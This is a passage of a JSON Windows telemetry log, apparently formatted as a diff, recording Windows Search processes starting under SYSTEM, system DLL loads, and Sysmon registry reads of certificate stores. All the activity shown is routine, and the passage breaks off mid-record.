Global\\UsGthrFltPipeMssGthrPipe16_ Global\\UsGthrCtrlFltPipeMssGthrPipe16 1 -2147483646 \"Software\\Microsoft\\Windows Search\" \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\" \"C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\usgthrsvc\" \"DownLevelDaemon\" ", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "SearchIndexer.exe", - "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", - "pid": 3560, - "ppid": 5824, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "subtype": "create", - "timestamp": 131883570915600000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}", - "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - "image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "SearchProtocolHost.exe", - "image_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570915590000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570915740000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "clbcatq.dll", - "image_path": "C:\\Windows\\System32\\clbcatq.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "registry", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchProtocolHost.exe", - "registry_key": "", - "registry_path": "HKCR", - "registry_value": "HKCR", - "timestamp": 131883570916060016, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\SearchFilterHost.exe\" 0 744 748 756 8192 752 ", - "event_type": "process", - "logon_id": 999, - "parent_process_name": "SearchIndexer.exe", - "parent_process_path": "C:\\Windows\\System32\\SearchIndexer.exe", - "pid": 6608, - "ppid": 5824, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "subtype": "create", - "timestamp": 131883570916229984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}", - "unique_ppid": "{42FC7E13-B303-5C05-0000-0010823E0600}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "image_load", - "image_name": "ole32.dll", - "image_path": "C:\\Windows\\System32\\ole32.dll", - "pid": 3560, - "process_name": "SearchProtocolHost.exe", - "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916210000, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 6608, - "process_name": "SearchFilterHost.exe", - "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", - "timestamp": 131883570916369984, - "unique_pid": 